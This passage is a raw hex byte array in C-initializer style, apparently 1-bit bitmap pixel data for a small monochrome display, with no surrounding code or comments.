0XFF,0XFC,0X1F,0XFE,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XE0,0X1F,
0XF0,0X0F,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0X80,0X7F,0XFC,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0X00,0X00,0X07,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFC,0X01,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFC,0X1F,0XFE,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XE0,0X1F,
0XF0,0X07,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0X80,0X7F,0XF8,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0X00,0X00,0X03,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFE,0X00,0X7F,0XFF,0XFF,0XFF,0XF8,0X01,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFC,0X1F,0XFE,0X3F,0XFF,0XFF,0X8F,0XFF,0X01,0XFF,0XFE,0X3F,0XFF,0XE0,0X1F,
0XF0,0X07,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0X80,0X7F,0XF8,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0X1F,0XE0,0X01,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0X00,0X3F,0XFF,0XFF,0XFF,0XF0,0X03,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFC,0X1F,0XFE,0X3F,0XFF,0XFE,0X07,0XFE,0X00,0X7F,0XFE,0X3F,0XFF,0XC0,0X3F,
0XF0,0X07,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XC0,0X3F,0XF0,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XF8,0X01,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0X80,0X1F,0XFF,0XFF,0XFF,0XE0,0X07,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFE,0X00,0X1F,0X00,0X00,0X00,0X00,0X1F,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFC,0X3F,0XFE,0X3F,0XFF,0XFC,0X03,0XFC,0X00,0X3F,0XFE,0X3F,0XFF,0XC0,0X3F,
0XF8,0X03,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XC0,0X1F,0XF0,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XFC,0X01,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0XE0,0X0F,0XFF,0XFF,0XFF,0XC0,0X1F,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFC,0X00,0X0F,0X00,0X00,0X00,0X00,0X1E,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X3F,0XFE,0X3F,0XFF,0XFC,0X61,0XF8,0X7E,0X1F,0XFE,0X3F,0XFF,0XC0,0X3F,
0XF8,0X03,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XC0,0X0F,0XC0,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XFC,0X01,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFF,0XFF,0X00,0X3F,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFC,0X00,0X0F,0X00,0X00,0X00,0X00,0X1C,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X3F,0XFE,0X3F,0XFF,0XF8,0XF1,0XF0,0XFF,0X9F,0XFE,0X3F,0XFF,0X80,0X3F,
0XF8,0X03,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XE0,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XFE,0X00,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0XF8,0X01,0XFF,0XFF,0XFE,0X00,0X7F,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFC,0X00,0X0F,0X00,0X00,0X00,0X00,0X1C,0X00,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X3F,0XFE,0X00,0X1F,0XF9,0XF8,0XF1,0XFF,0X8F,0XFE,0X3F,0XFF,0X80,0X7F,
0XF8,0X03,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XF0,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XFE,0X00,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0XFC,0X00,0XFF,0XFF,0XFC,0X00,0XFF,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFE,0X00,0X0F,0X00,0X00,0X00,0X00,0X1E,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X7F,0XFE,0X00,0X07,0XF9,0XF8,0XF3,0XFF,0XCF,0XFE,0X3F,0XFF,0X80,0X00,
0X00,0X01,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XE0,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XFE,0X00,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0XFC,0X00,0X7F,0XFF,0XF8,0X00,0XFF,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X7F,0XFE,0X00,0X01,0XF9,0XF0,0XF3,0XFF,0XCF,0XFE,0X3F,0XFF,0X80,0X00,
0X00,0X01,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XE0,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XFE,0X00,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0XF8,0X00,0X3F,0XFF,0XF0,0X00,0X7F,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XE0,0XFF,0XFE,0X00,0X00,0XFC,0XE1,0XF3,0XFF,0XCF,0XFE,0X3F,0XFF,0X00,0X00,
0X00,0X01,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0XC0,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XFE,0X00,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0XF0,0X00,0X0F,0XFF,0XC0,0X00,0X3F,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XC0,0XFF,0XFF,0XFF,0X00,0X7C,0X01,0XF3,0XFF,0XFF,0XFE,0X3F,0XFF,0X00,0X00,
0X00,0X00,0XFF,0X80,0X7F,0XFC,0X01,0XFF,0X80,0X70,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XFE,0X00,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0XE0,0X00,0X07,0XFF,0X80,0X00,0X1F,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XC1,0XFF,0XFF,0XFF,0XE0,0X7E,0X03,0XF3,0XFF,0XFF,0XFE,0X3F,0XFF,0X00,0X00,
0X00,0X00,0XFF,0X80,0X7F,0XF8,0X01,0XFF,0X80,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFE,0X00,0XFF,0XFE,0X01,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0X80,0X10,0X03,0XFF,0X00,0X20,0X0F,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X00,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0X83,0XFF,0XFF,0XFF,0XF8,0X3F,0X8F,0XF3,0XFF,0XFF,0XFE,0X3F,0XFE,0X00,0X00,
0X00,0X00,0XFF,0X80,0X7F,0XF8,0X01,0XFF,0X80,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFF,0X00,0X7F,0XFC,0X01,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFF,0X00,0X3C,0X01,0XFE,0X00,0XF0,0X03,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0X03,0XFF,0XFF,0XFF,0XFC,0X3F,0XFF,0XF3,0XFF,0XFF,0XFE,0X3F,0XFE,0X00,0X00,
0X00,0X00,0XFF,0X80,0X3F,0XF0,0X01,0XFF,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFF,0X00,0X7F,0XFC,0X01,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFE,0X00,0X7E,0X00,0X78,0X01,0XF8,0X01,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X00,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFE,0X07,0XFF,0XFF,0XFF,0XFC,0X1F,0XFF,0XF3,0XFF,0XFF,0XFE,0X3F,0XFE,0X01,0XFF,
0XFF,0X00,0X7F,0X80,0X3F,0XE0,0X01,0XFF,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFF,0X00,0X3F,0XF8,0X01,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XFC,0X00,0XFF,0X00,0X30,0X03,0XFC,0X00,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFC,0X0F,0XFF,0XFF,0XFF,0XFE,0X1F,0XFF,0XF3,0XFF,0XFF,0XFE,0X3F,0XFE,0X01,0XFF,
0XFF,0X00,0X7F,0X80,0X3F,0XC0,0X01,0XFF,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X00,0X00,0X01,0XFF,0X80,0X1F,0XF0,0X03,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XF0,0X03,0XFF,0X80,0X00,0X07,0XFF,0X00,0X7F,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF8,0X1F,0XFF,0XFF,0XFF,0XFE,0X1F,0XFF,0XF3,0XFF,0XFF,0XFE,0X3F,0XFC,0X03,0XFF,
0XFF,0X00,0X7F,0XC0,0X0F,0X00,0X01,0XFF,0X80,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X00,0X00,0X01,0XFF,0X80,0X0F,0XE0,0X03,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XE0,0X07,0XFF,0XC0,0X00,0X1F,0XFF,0X80,0X1F,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF8,0X3F,0XFF,0XFF,0XFF,0XFE,0X1F,0XFF,0XF3,0XFF,0XFF,0XFE,0X3F,0XFC,0X03,0XFF,
0XFF,0X00,0X3F,0XC0,0X00,0X00,0X01,0XFF,0X80,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X00,0X00,0X01,0XFF,0XC0,0X00,0X00,0X07,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0XC0,0X0F,0XFF,0XF0,0X00,0X3F,0XFF,0XC0,0X0F,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XF0,0X7F,0XFF,0XFF,0XFF,0XFE,0X1F,0XFF,0XF3,0XFF,0XFF,0XFE,0X3F,0XFC,0X03,0XFF,
0XFF,0X80,0X3F,0XC0,0X00,0X03,0X01,0XFF,0XC0,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X00,0X00,0X01,0XFF,0XE0,0X00,0X00,0X0F,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0X80,0X1F,0XFF,0XF8,0X00,0X7F,0XFF,0XE0,0X07,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XE0,0X7F,0XFF,0XFF,0XFF,0XFE,0X1F,0XFF,0XF3,0XFF,0XFF,0XFE,0X3F,0XF8,0X03,0XFF,
0XFF,0X80,0X3F,0XE0,0X00,0X06,0X01,0XFF,0XC0,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X00,0X00,0X01,0XFF,0XE0,0X00,0X00,0X1F,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFF,0X00,0X7F,0XFF,0XFC,0X00,0XFF,0XFF,0XF8,0X03,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFE,0X1F,0X00,0X00,0X1F,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XC0,0XFF,0XFF,0XFF,0XFF,0XFE,0X1F,0XFF,0XF3,0XFF,0XFF,0XFE,0X3F,0XF8,0X07,0XFF,
0XFF,0X80,0X1F,0XF0,0X00,0X0E,0X01,0XFF,0XF0,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X00,0X00,0X01,0XFF,0XF0,0X00,0X00,0X3F,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XFC,0X00,0XFF,0XFF,0XFE,0X01,0XFF,0XFF,0XFC,0X00,0XFF,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFC,0X1F,0XC0,0X00,0X7E,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0X81,0XFF,0XFF,0XFF,0XFF,0XFC,0X3F,0XFF,0XF3,0XFF,0XCF,0XFE,0X3F,0XF8,0X07,0XFF,
0XFF,0XC0,0X1F,0XF8,0X00,0X1E,0X01,0XFF,0XE0,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X00,0X00,0X01,0XFF,0XFC,0X00,0X00,0X7F,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XF8,0X01,0XFF,0XFF,0XFF,0X87,0XFF,0XFF,0XFE,0X00,0X7F,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XF0,0X01,0XFE,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0X03,0XFF,0XFF,0XFF,0XFF,0XFC,0X3F,0XFF,0XF3,0XFF,0XCF,0XFE,0X3F,0XF0,0X07,0XFF,
0XFF,0XC0,0X1F,0XFC,0X00,0X3E,0X01,0XFF,0XC0,0X00,0X00,0X00,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0X00,0X00,0X00,0X01,0XFF,0XFF,0X00,0X03,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XF0,0X03,0XFF,0XFF,0XFF,0XDF,0XFF,0XFF,0XFF,0X00,0X3F,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XF0,0X1F,0XFF,0XFF,0XFF,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,
0X07,0XFF,0XFF,0XFF,0XFF,0XF8,0X7F,0XFF,0XF3,0XFF,0XCF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFF,0XFF,0XFF,0X80,0X3F,0XFC,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X1F,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0XE0,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X1F,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XE0,0X3F,0XFF,0XFF,0XFF,0X80,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,
0X0F,0XFF,0XFF,0XFF,0XFF,0XF0,0X7F,0XFF,0XF3,0XFF,0X8F,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X7F,0XFE,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0X80,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X07,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XC0,0X7F,0XFF,0XFF,0XFF,0XC0,0X7F,0XFF,0XFF,0XFF,0XFF,0XFC,
0X0F,0XFF,0XFF,0XFF,0XFF,0XE0,0XFF,0XFF,0XF1,0XFF,0X8F,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFF,0X00,0X3F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X03,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X80,0XFF,0XFF,0XFF,0XFF,0XE0,0X3F,0XFF,0XFF,0XFF,0XFF,0XF8,
0X00,0X00,0X07,0XF9,0XFF,0X81,0XFF,0XFF,0XF8,0XFF,0X1F,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0XFF,0XFF,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFE,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X01,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X01,0XFF,0XFE,0X1F,0XFF,0XF0,0X3F,0XFF,0XFF,0XFF,0XFF,0XF8,
0X00,0X00,0X07,0XF8,0X00,0X03,0XFF,0XFF,0XF8,0X00,0X3F,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X01,0XFF,0XFF,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XFC,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0XFE,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X03,0XFF,0XFE,0X0F,0XFF,0XF8,0X1F,0XFF,0XFF,0XFF,0XFF,0XF8,
0X00,0X00,0X07,0XF8,0X00,0X07,0XFF,0XFF,0XFC,0X00,0X7F,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X01,0XFF,0XFF,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XF0,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X3E,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X07,0XFF,0XFE,0X0F,0XFF,0XFC,0X1F,0XFF,0XFF,0XFF,0XFF,0XF8,
0X00,0X00,0X07,0XF8,0X00,0X0F,0XFF,0XFF,0XFF,0X00,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0XFF,0XFE,0X00,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XE0,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X1E,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0X0F,0XFF,0XFE,0X0F,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,0XFF,0XF8,
0X00,0X00,0X07,0XF8,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X7F,0XFC,0X00,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0XC0,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X0E,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X3F,0XF0,0X01,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X01,
0X80,0X1F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X06,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X01,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X03,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X1F,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFC,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X3F,0XFF,0XFF,0XFF,
0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,
